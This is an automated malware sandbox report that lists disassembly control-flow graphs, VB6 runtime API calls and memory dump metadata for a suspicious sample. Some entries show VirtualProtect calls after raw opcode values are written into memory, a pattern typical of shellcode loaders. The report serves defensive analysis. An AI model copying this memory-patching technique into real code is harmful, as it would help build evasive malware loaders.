                                                                    • Opcode ID: a1bb3d0061758154b8bfe0a1f7d7646081a2f7521e0348a24d6c14aa9fc3d1dc
                                                                    • Instruction ID: 7669973d0e9846490f9b776014c01caf568f332edc960939a8aab0d750e8df83
                                                                    • Opcode Fuzzy Hash: a1bb3d0061758154b8bfe0a1f7d7646081a2f7521e0348a24d6c14aa9fc3d1dc
                                                                    • Instruction Fuzzy Hash: 4B02C8B5D402099FDF04EFE5C985EDEBBB8FF08308F10452AF501BB2A1DA3999059B65

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 266 57c62d-57c663 __vbaChkstk 267 57c665-57c67e __vbaNew2 266->267 268 57c680 266->268 269 57c68a-57c69c 267->269 268->269 270 57c69e-57c6b7 __vbaNew2 269->270 271 57c6b9 269->271 272 57c6c3-57c6e9 __vbaObjSetAddref 270->272 271->272 274 57c705 272->274 275 57c6eb-57c703 __vbaHresultCheckObj 272->275 276 57c70c-57c724 __vbaFreeObj call 54c087 274->276 275->276 279 57c726 276->279 280 57c72b-57c738 call 5539b0 276->280 281 57d084-57d0d2 __vbaAryUnlock 279->281 285 57c73f-57c7f1 __vbaAryLock #644 __vbaAryUnlock call 54ac41 call 57d330 __vbaObjSet __vbaObjSetAddref __vbaFreeObj __vbaObjSetAddref #644 __vbaFreeObj 280->285 286 57c73a 280->286 291 57c7f5 285->291 292 57c7f3-57c838 __vbaObjSetAddref call 54c6e3 __vbaFreeObj 285->292 286->281 291->281 296 57c83f-57c872 292->296 297 57c83a 292->297 298 57c874-57c87b 296->298 299 57c888-57c894 296->299 297->281 300 57c896-57c8a2 298->300 301 57c87d-57c884 298->301 302 57c8b0-57c8d3 299->302 300->302 303 57c886 301->303 304 57c8a4-57c8a9 301->304 305 57c8d5-57c918 call 57d0e2 __vbaFreeVar 302->305 306 57c91d-57c92b 302->306 303->302 304->302 305->306 307 57c995-57c9a3 306->307 308 57c92d-57c93f call 54c523 306->308 311 57ca05-57ca13 307->311 312 57c9a5-57c9af call 54db30 307->312 308->307 318 57c941-57c990 call 57d0e2 __vbaFreeVar call 40a4ec __vbaSetSystemError 308->318 315 57ca15 call 54bde0 311->315 316 57ca1a-57ca28 311->316 312->311 325 57c9b1-57ca00 call 57d0e2 __vbaFreeVar call 40a4ec __vbaSetSystemError 312->325 315->316 320 57ca8a-57ca99 316->320 321 57ca2a-57ca34 call 54c4c4 316->321 318->307 326 57cb03-57cb12 320->326 327 57ca9b-57caad call 54c523 320->327 321->320 338 57ca36-57ca85 call 57d0e2 __vbaFreeVar call 40a4ec __vbaSetSystemError 321->338 325->311 331 57cb74-57cb83 326->331 332 57cb14-57cb1e call 57d22e 326->332 327->326 342 57caaf-57cafe call 57d0e2 __vbaFreeVar call 40a4ec __vbaSetSystemError 327->342 335 57cb85-57cb97 call 54c523 331->335 336 57cbed-57cbfc 331->336 332->331 356 57cb20-57cb6f call 57d0e2 __vbaFreeVar call 40a4ec __vbaSetSystemError 332->356 335->336 358 57cb99-57cbe8 call 57d0e2 __vbaFreeVar call 40a4ec __vbaSetSystemError 335->358 345 57cc5e-57cc6d 336->345 346 57cbfe-57cc08 call 54dd70 336->346 338->320 342->326 352 57cccf-57cd19 345->352 353 57cc6f-57cc79 call 54c40e 345->353 346->345 369 57cc0a-57cc59 call 57d0e2 __vbaFreeVar call 40a4ec __vbaSetSystemError 346->369 367 57cd1f-57cd30 352->367 368 57cf1e-57cf28 352->368 353->352 374 57cc7b-57ccca call 57d0e2 __vbaFreeVar call 40a4ec __vbaSetSystemError 353->374 356->331 358->336 377 57cd36-57cf14 __vbaAryLock call 54c5b5 __vbaStrMove __vbaAryLock __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat call 54bf65 __vbaAryUnlock __vbaFreeStrList __vbaFreeVar call 54c5b5 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaChkstk call 54ae7c __vbaStrVarVal #644 call 40a42c __vbaSetSystemError __vbaFreeStrList __vbaFreeVarList __vbaAryUnlock 367->377 378 57cf19 367->378 375 57cf2e-57cf51 368->375 376 57d039-57d07f #644 call 54ac32 #644 call 54ac32 368->376 369->345 374->352 384 57cfc7-57d023 call 40a46c __vbaSetSystemError __vbaAryLock call 54c229 375->384 385 57cf53-57cfc5 call 40a46c __vbaSetSystemError __vbaAryLock call 54c229 __vbaAryUnlock __vbaFreeVar 375->385 376->281 377->378 378->368 408 57d028-57d034 __vbaAryUnlock __vbaFreeVar 384->408 385->376 408->376
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0057C60D), ref: 0057C64A
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,0000000A,?,00000000,00401006,?,?,?,0057C60D), ref: 0057C66F
                                                                    • __vbaNew2.MSVBVM60(00408448,0057F314), ref: 0057C6A8
                                                                    • __vbaObjSetAddref.MSVBVM60(00401006,?), ref: 0057C6CF
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0057C6F8
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0057C70F
                                                                    • __vbaAryLock.MSVBVM60(?,0057F320), ref: 0057C74A
                                                                    • #644.MSVBVM60(?,?,0057F320), ref: 0057C760
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,0057F320), ref: 0057C76C
                                                                    • __vbaObjSet.MSVBVM60(00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C79D
                                                                    • __vbaObjSetAddref.MSVBVM60(0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7AC
                                                                    • __vbaFreeObj.MSVBVM60(0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7B4
                                                                    • __vbaObjSetAddref.MSVBVM60(00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7C5
                                                                    • #644.MSVBVM60(00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7CB
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7D9
                                                                    • __vbaObjSetAddref.MSVBVM60(00401006,00000000,0057F318,0057F2E8,00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?), ref: 0057C818
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00401006,00000000,0057F318,0057F2E8,00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?), ref: 0057C82D
                                                                    • __vbaAryUnlock.MSVBVM60(?,0057D0D3,00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057D0CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$AddrefFree$#644New2Unlock$CheckChkstkHresultLock
                                                                    • String ID:
                                                                    • API String ID: 452095399-0
                                                                    • Opcode ID: 5ee6c31ba54d2ccb82314373c12b7eea726bc6b663a35b91111638c8f2cea951
                                                                    • Instruction ID: 5b70c70bdb4acf05965a8b5bbfeebf3b5dfcab051965810b139fbf24b8ba5b45
                                                                    • Opcode Fuzzy Hash: 5ee6c31ba54d2ccb82314373c12b7eea726bc6b663a35b91111638c8f2cea951
                                                                    • Instruction Fuzzy Hash: C16209719002099FDB50EBA9DD85BDDBBB8BF08304F50416AF209FB2A2DB34D985DB15

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054B96E,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054EE5D
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,?,?,00000000,00401006,?,?,?,0054B96E), ref: 0054EE82
                                                                    • __vbaNew.MSVBVM60(0040A2AC,0040A2BC), ref: 0054EE94
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,0040A2AC,0040A2BC), ref: 0054EE9E
                                                                    • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEA4
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEAE
                                                                    • __vbaObjSetAddref.MSVBVM60(0057F2AC,00000000,?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEBD
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0057F2AC,00000000,?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EECC
                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEE0
                                                                    • #644.MSVBVM60(00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEE6
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEF1
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054EF37
                                                                    • #644.MSVBVM60(?,?,?), ref: 0054EF4F
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054EF5B
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,00000000), ref: 0054EF80
                                                                    • #644.MSVBVM60(00000000,00000000,00000000), ref: 0054EF86
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,00000000), ref: 0054EF91
                                                                    • #644.MSVBVM60(0040A2AC,00000000,00000000,00000000), ref: 0054EF9A
                                                                    • __vbaAryLock.MSVBVM60(?,?,00000000,00000000,0040A2AC,00000000,00000000,00000000), ref: 0054EFAF
                                                                    • #644.MSVBVM60(?,?,?,00000000,00000000,0040A2AC,00000000,00000000,00000000), ref: 0054EFC6
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000000,0040A2AC,00000000,00000000,00000000), ref: 0054EFD2
                                                                    • #644.MSVBVM60(?,?,?,?,?,00000000,00000000,0040A2AC,00000000,00000000,00000000), ref: 0054EFE1
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,0040A2BC,00000003,00000001,00000010,00000000,?,00000000,?,?,?,?,?,00000000,00000000), ref: 0054F01F
                                                                    • #644.MSVBVM60(?,?,?,00000000,00000000,00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054F02B
                                                                    • #644.MSVBVM60(00000040), ref: 0054F04C
                                                                    • __vbaAryLock.MSVBVM60(?,0040A2BC,?,0040A2B0,00000040), ref: 0054F072
                                                                    • __vbaStrCat.MSVBVM60(0040A2E4,0040A2DC,?,00000000,?,0040A2BC,?,0040A2B0,00000040), ref: 0054F097
                                                                    • __vbaStrMove.MSVBVM60(0040A2E4,0040A2DC,?,00000000,?,0040A2BC,?,0040A2B0,00000040), ref: 0054F0A1
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A2E4,0040A2DC,?,00000000,?,0040A2BC,?,0040A2B0,00000040), ref: 0054F0A7
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040A2E4,0040A2DC,?,00000000,?,0040A2BC,?,0040A2B0,00000040), ref: 0054F0C1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A2BC,0000002C), ref: 0054F0E1
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054F0F3
                                                                    • __vbaFreeStr.MSVBVM60(?), ref: 0054F0FB
                                                                    • #644.MSVBVM60(?,?), ref: 0054F104
                                                                    • __vbaStrCat.MSVBVM60(0040AA60,0040AA58,?,?), ref: 0054F116
                                                                    • __vbaStrMove.MSVBVM60(0040AA60,0040AA58,?,?), ref: 0054F120
                                                                    • __vbaStrCat.MSVBVM60(0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F12B
                                                                    • #638.MSVBVM60(00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F145
                                                                    • __vbaFreeStr.MSVBVM60(00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F158
                                                                    • __vbaFreeVar.MSVBVM60(00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F160
                                                                    • __vbaAryLock.MSVBVM60(?,0040A2BC,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F19B
                                                                    • #644.MSVBVM60(?,?,0040A2BC,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F1B3
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,0040A2BC,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F1BF
                                                                    • #644.MSVBVM60(0424448B,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F1E4
                                                                    • #644.MSVBVM60(408B008B,-00000004,?,00000004,0424448B,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F208
                                                                    • #644.MSVBVM60(20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004,0424448B,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60), ref: 0054F22C
                                                                    • #644.MSVBVM60(E02474FF,-0000000C,?,00000004,20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004,0424448B,0040A2BC,00000000,0040A2BC), ref: 0054F250
                                                                    • #644.MSVBVM60(0000E0FF,-00000010,?,00000004,E02474FF,-0000000C,?,00000004,20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004), ref: 0054F274
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,-00000014,?,00000004,0000E0FF,-00000010), ref: 0054F2D7
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A2BC,00000020), ref: 0054F2F7
                                                                    • __vbaAryLock.MSVBVM60(?,0040A2BC,0040A2BC), ref: 0054F341
                                                                    • #644.MSVBVM60(?,?,0040A2BC,0040A2BC), ref: 0054F359
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,0040A2BC,0040A2BC), ref: 0054F365
                                                                    • #644.MSVBVM60(0040A2AC,0040A2BC), ref: 0054F383
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054F3E0,0000E0FF,00000000,0040A2AC,0040A2BC), ref: 0054F3CF
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,0040A2BC,00000000,?,0054F3E0,0000E0FF,00000000,0040A2AC,0040A2BC), ref: 0054F3DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Free$LockUnlock$Addref$CheckDestructHresultMoveProtectRedimVirtual$#638CastChkstkList
                                                                    • String ID: @
                                                                    • API String ID: 1659925571-2766056989
                                                                    • Opcode ID: 546dd4561fb5e0cddda09a067700fe8852273202ed3fce2f30aa315b787fbda3
                                                                    • Instruction ID: 58188ec10928086fb90cd05e538dca631ba5c27e21bfc80d5300524514002e27
                                                                    • Opcode Fuzzy Hash: 546dd4561fb5e0cddda09a067700fe8852273202ed3fce2f30aa315b787fbda3
                                                                    • Instruction Fuzzy Hash: D202EBB5D40209AFDF04EFE4D985EEEBBB8FF08308F10442AF601BB291D67999449B54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 470 54d6db-54d72e __vbaChkstk __vbaVarVargNofree __vbaStrVarCopy __vbaStrMove 471 54d730-54d73f call 54ac41 470->471 472 54d742-54d746 470->472 471->472 474 54d75e-54d761 472->474 475 54d748-54d75c __vbaNew2 472->475 477 54d764-54d784 474->477 475->477 479 54d786-54d79b __vbaHresultCheckObj 477->479 480 54d79d 477->480 481 54d7a1-54d7ec __vbaStrToAnsi call 40a760 __vbaSetSystemError __vbaFreeStrList 479->481 480->481 484 54d7f2-54d7f6 481->484 485 54da03-54dab2 call 40a6b0 __vbaSetSystemError __vbaLenBstr __vbaStrToAnsi call 40a8a0 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr call 40a5b0 __vbaSetSystemError __vbaAryLock call 40a630 481->485 486 54d80e-54d811 484->486 487 54d7f8-54d80c __vbaNew2 484->487 502 54dab7-54dae2 __vbaSetSystemError __vbaAryUnlock __vbaRedimPreserve 485->502 489 54d814-54d834 486->489 487->489 494 54d836-54d84b __vbaHresultCheckObj 489->494 495 54d84d 489->495 497 54d851-54d868 __vbaStrToAnsi call 40a760 494->497 495->497 501 54d86d-54d89c __vbaSetSystemError __vbaFreeStrList 497->501 501->485 503 54d8a2-54d8a6 501->503 504 54dae7-54db1a __vbaFreeObj __vbaFreeStr 502->504 505 54d8be-54d8c1 503->505 506 54d8a8-54d8bc __vbaNew2 503->506 508 54d8c4-54d8e4 505->508 506->508 510 54d8e6-54d8fb __vbaHresultCheckObj 508->510 511 54d8fd 508->511 512 54d901-54d94c __vbaStrToAnsi call 40a760 __vbaSetSystemError __vbaFreeStrList 510->512 511->512 512->485 515 54d952-54d956 512->515 516 54d96e-54d971 515->516 517 54d958-54d96c __vbaNew2 515->517 518 54d974-54d994 516->518 517->518 520 54d996-54d9ab __vbaHresultCheckObj 518->520 521 54d9ad 518->521 522 54d9b1-54d9fc __vbaStrToAnsi call 40a760 __vbaSetSystemError __vbaFreeStrList 520->522 521->522 522->485 525 54d9fe 522->525 525->504
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D6F6
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D70E
                                                                    • __vbaStrVarCopy.MSVBVM60(00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D714
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D71E
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000,00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D751
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,0000001C,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF), ref: 0054D793
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00004008,00000018,00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF), ref: 0054D7AC
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401006,?,?,?,0054CCAF), ref: 0054D7C0
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,00004008,?,?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401006), ref: 0054D7DE
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000), ref: 0054D801
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,0000001C), ref: 0054D843
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008), ref: 0054D85C
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 0054D870
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 0054D88E
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000), ref: 0054D8B1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,00000020), ref: 0054D8F3
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000000), ref: 0054D90C
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000000), ref: 0054D920
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 0054D93E
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000), ref: 0054D961
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,00000020), ref: 0054D9A3
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008), ref: 0054D9BC
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 0054D9D0
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 0054D9EE
                                                                    • __vbaSetSystemError.MSVBVM60(?,00008003,00000000,00000000,?), ref: 0054DA18
                                                                    • __vbaLenBstr.MSVBVM60(?,00000000,?,00008003,00000000,00000000,?), ref: 0054DA22
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054DA2F
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054DA40
                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,00000000,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054DA4C
                                                                    • __vbaFreeStr.MSVBVM60 ref: 0054DA63
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00006610,00000000,00000000,00000000), ref: 0054DA81
                                                                    • __vbaAryLock.MSVBVM60(?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054DA8F
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000001,00000000,?,00000000,?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054DAB7
                                                                    • __vbaAryUnlock.MSVBVM60(?,00000000,00000000,00000001,00000000,?,00000000,?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054DAC0
                                                                    • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,?,00000000,00000000,00000001,00000000,?,00000000,?,?), ref: 0054DADA
                                                                    • __vbaFreeObj.MSVBVM60(0054DB1B,?,00000000), ref: 0054DB0D
                                                                    • __vbaFreeStr.MSVBVM60(0054DB1B,?,00000000), ref: 0054DB15
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$Free$Ansi$CheckHresultListNew2$BstrChkstkCopyLockMoveNofreePreserveRedimUnicodeUnlockVarg
                                                                    • String ID:
                                                                    • API String ID: 1357747868-0
                                                                    • Opcode ID: 7dc21813d9a4bf095005ce266a502b0cdacc1b0d5717a13fcc51496f7ea57067
                                                                    • Instruction ID: 6eba8aa71e126c827b71befec4c26177b9909ed4f3e53c437c078aa340996b94
                                                                    • Opcode Fuzzy Hash: 7dc21813d9a4bf095005ce266a502b0cdacc1b0d5717a13fcc51496f7ea57067
                                                                    • Instruction Fuzzy Hash: 42D1C271D4020DAEDF11EFE1C846BEEBBB9BF08704F10442AF601BA1A1D7789A45DB65

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054B901
                                                                    • #644.MSVBVM60(?,?,?,?,00401006), ref: 0054B919
                                                                    • #644.MSVBVM60(00000000,?,?,?,?,?,00401006), ref: 0054B93E
                                                                    • #644.MSVBVM60(?,?,-00000004,00000000,?,?,?,?,?,00401006), ref: 0054B95A
                                                                      • Part of subcall function 0054EE42: __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054B96E,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054EE5D
                                                                      • Part of subcall function 0054EE42: __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,?,?,00000000,00401006,?,?,?,0054B96E), ref: 0054EE82
                                                                      • Part of subcall function 0054EE42: __vbaNew.MSVBVM60(0040A2AC,0040A2BC), ref: 0054EE94
                                                                      • Part of subcall function 0054EE42: __vbaObjSet.MSVBVM60(?,00000000,0040A2AC,0040A2BC), ref: 0054EE9E
                                                                      • Part of subcall function 0054EE42: __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEA4
                                                                      • Part of subcall function 0054EE42: __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEAE
                                                                      • Part of subcall function 0054EE42: __vbaObjSetAddref.MSVBVM60(0057F2AC,00000000,?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEBD
                                                                      • Part of subcall function 0054EE42: __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0057F2AC,00000000,?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EECC
                                                                      • Part of subcall function 0054EE42: __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEE0
                                                                      • Part of subcall function 0054EE42: #644.MSVBVM60(00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEE6
                                                                      • Part of subcall function 0054EE42: __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEF1
                                                                      • Part of subcall function 0054EE42: __vbaAryLock.MSVBVM60(?,?), ref: 0054EF37
                                                                      • Part of subcall function 0054EE42: #644.MSVBVM60(?,?,?), ref: 0054EF4F
                                                                      • Part of subcall function 0054EE42: __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054EF5B
                                                                    • __vbaChkstk.MSVBVM60(?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B980
                                                                      • Part of subcall function 0054BC0E: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BC2A
                                                                      • Part of subcall function 0054BC0E: __vbaVarDup.MSVBVM60(?,00000003,?,?,00401006), ref: 0054BC42
                                                                      • Part of subcall function 0054BC0E: #644.MSVBVM60(?,00000003,?,?,00401006), ref: 0054BC4D
                                                                      • Part of subcall function 0054BC0E: __vbaI4Var.MSVBVM60(?,00000000,?,00000003,?,?,00401006), ref: 0054BC57
                                                                      • Part of subcall function 0054BC0E: __vbaFreeVar.MSVBVM60(0054BD4A,00000000,?,00000000,?,00000002,?), ref: 0054BD44
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B99B
                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9A5
